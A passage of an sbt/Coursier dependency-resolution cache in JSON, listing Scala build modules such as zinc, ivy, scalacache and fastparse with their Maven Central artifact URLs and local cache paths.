jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"protocol_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"protocol_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/protocol_2.12/1.3.8/protocol_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/protocol_2.12/1.3.8/protocol_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang\",\"name\":\"scala-reflect\",\"revision\":\"2.12.10\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-reflect\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/.sbt/boot/scala-2.12.10/lib/scala-reflect.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://www.scala-lang.org/\",\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.lihaoyi\",\"name\":\"fastparse_2.12\",\"revision\":\"0.4.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"fastparse_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/lihaoyi/fastparse_2.12/0.4.2/fastparse_2.12-0.4.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lihaoyi/fastparse_2.12/0.4.2/fastparse_2.12-0.4.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/lihaoyi/scala-parser\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang.modules\",\"name\":\"scala-parser-combinators_2.12\",\"revision\":\"1.1.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-parser-combinators_2.12\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-lang/modules/scala-parser-combinators_2.12/1.1.2/scala-parser-combinators_2.12-1.1.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/modules/scala-parser-combinators_2.12/1.1.2/scala-parser-combinators_2.12-1.1.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://www.scala-lang.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"zinc_2.12\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"zinc_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/zinc_2.12/1.3.4/zinc_2.12-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc_2.12/1.3.4/zinc_2.12-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.github.cb372\",\"name\":\"scalacache-caffeine_2.12\",\"revision\":\"0.20.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scalacache-caffeine_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/github/cb372/scalacache-caffeine_2.12/0.20.0/scalacache-caffeine_2.12-0.20.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/github/cb372/scalacache-caffeine_2.12/0.20.0/scalacache-caffeine_2.12-0.20.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/cb372/scalacache\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt.ivy\",\"name\":\"ivy\",\"revision\":\"2.3.0-sbt-88d6a93d15f9b029958c1c289a8859e8dfe31a19\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"ivy\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/ivy/ivy/2.3.0-sbt-88d6a93d15f9b029958c1c289a8859e8dfe31a19/ivy-2.3.0-sbt-88d6a93d15f9b029958c1c289a8859e8dfe31a19.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/ivy/ivy/2.3.0-sbt-88d6a93d15f9b029958c1c289a8859e8dfe31a19/ivy-2.3.0-sbt-88d6a93d15f9b029958c1c289a8859e8dfe31a19.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/ivy\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"logic_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"logic_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/logic_2.12/1.3.8/logic_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/logic_2.12/1.3.8/logic_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt.ipcsocket\",\"name\":\"ipcsocket\",\"revision\":\"1.0.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"ipcsocket\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/ipcsocket/ipcsocket/1.0.0/ipcsocket-1.0.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/ipcsocket/ipcsocket/1.0.0/ipcsocket-1.0.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/ipcsocket\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"zinc-persist_2.12\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"zinc-persist_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/zinc-persist_2.12/1.3.4/zinc-persist_2.12-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-persist_2.12/1.3.4/zinc-persist_2.12-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.eed3si9n\",\"name\":\"shaded-scalajson_2.12\",\"revision\":\"1.0.0-M4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"shaded-scalajson_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/eed3si9n/shaded-scalajson_2.12/1.0.0-M4/shaded-scalajson_2.12-1.0.0-M4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/shaded-scalajson_2.12/1.0.0-M4/shaded-scalajson_2.12-1.0.0-M4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/mdedetrich/scalajson\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"collections_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"collections_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/collections_2.12/1.3.8/collections_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/collections_2.12/1.3.8/collections_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"launcher-interface\",\"revision\":\"1.1.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"launcher-interface\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/launcher-interface/1.1.3/launcher-interface-1.1.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/launcher-interface/1.1.3/launcher-interface-1.1.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://scala-sbt.org\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.trueaccord.scalapb\",\"name\":\"scalapb-runtime_2.12\",\"revision\":\"0.6.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scalapb-runtime_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/trueaccord/scalapb/scalapb-runtime_2.12/0.6.0/scalapb-runtime_2.12-0.6.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/trueaccord/scalapb/scalapb-runtime_2.12/0.6.0/scalapb-runtime_2.12-0.6.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/scalapb/ScalaPB\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"compiler-interface\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"compiler-interface\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/compiler-interface/1.3.4/compiler-interface-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/compiler-interface/1.3.4/compiler-interface-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"util-control_2.12\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"util-control_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/util-control_2.12/1.3.3/util-control_2.12-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-control_2.12/1.3.3/util-control_2.12-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/util\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"test-agent\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"test-agent\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/test-agent/1.3.8/test-agent-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/test-agent/1.3.8/test-agent-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"zinc-classfile_2.12\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"zinc-classfile_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/zinc-classfile_2.12/1.3.4/zinc-classfile_2.12-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-classfile_2.12/1.3.4/zinc-classfile_2.12-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"zinc-apiinfo_2.12\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"zinc-apiinfo_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/zinc-apiinfo_2.12/1.3.4/zinc-apiinfo_2.12-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-apiinfo_2.12/1.3.4/zinc-apiinfo_2.12-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"completion_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"completion_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/completion_2.12/1.3.8/completion_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/completion_2.12/1.3.8/completion_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"zinc-compile_2.12\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"zinc-compile_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/zinc-compile_2.12/1.3.4/zinc-compile_2.12-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-compile_2.12/1.3.4/zinc-compile_2.12-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"io.get-coursier\",\"name\":\"lm-coursier-shaded_2.12\",\"revision\":\"2.0.0-RC5-3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"lm-coursier-shaded_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/io/get-coursier/lm-coursier-shaded_2.12/2.0.0-RC5-3/lm-coursier-shaded_2.12-2.0.0-RC5-3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/io/get-coursier/lm-coursier-shaded_2.12/2.0.0-RC5-3/lm-coursier-shaded_2.12-2.0.0-RC5-3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/coursier/sbt-coursier\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"core-macros_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"core-macros_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/core-macros_2.12/1.3.8/core-macros_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/core-macros_2.12/1.3.8/core-macros_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"run_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"run_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/run_2.12/1.3.8/run_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/run_2.12/1.3.8/run_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.github.cb372\",\"name\":\"scalacache-core_2.12\",\"revision\":\"0.20.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scalacache-core_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/github/cb372/scalacache-core_2.12/0.20.0/scalacache-core_2.12-0.20.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/github/cb372/scalacache-core_2.12/0.20.0/scalacache-core_2.12-0.20.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/cb372/scalacache\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"util-position_2.12\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"util-position_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/util-position_2.12/1.3.3/util-position_2.12-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-position_2.12/1.3.3/util-position_2.12-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/util\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.eed3si9n\",\"name\":\"sjson-new-core_2.12\",\"revision\":\"0.8.3\"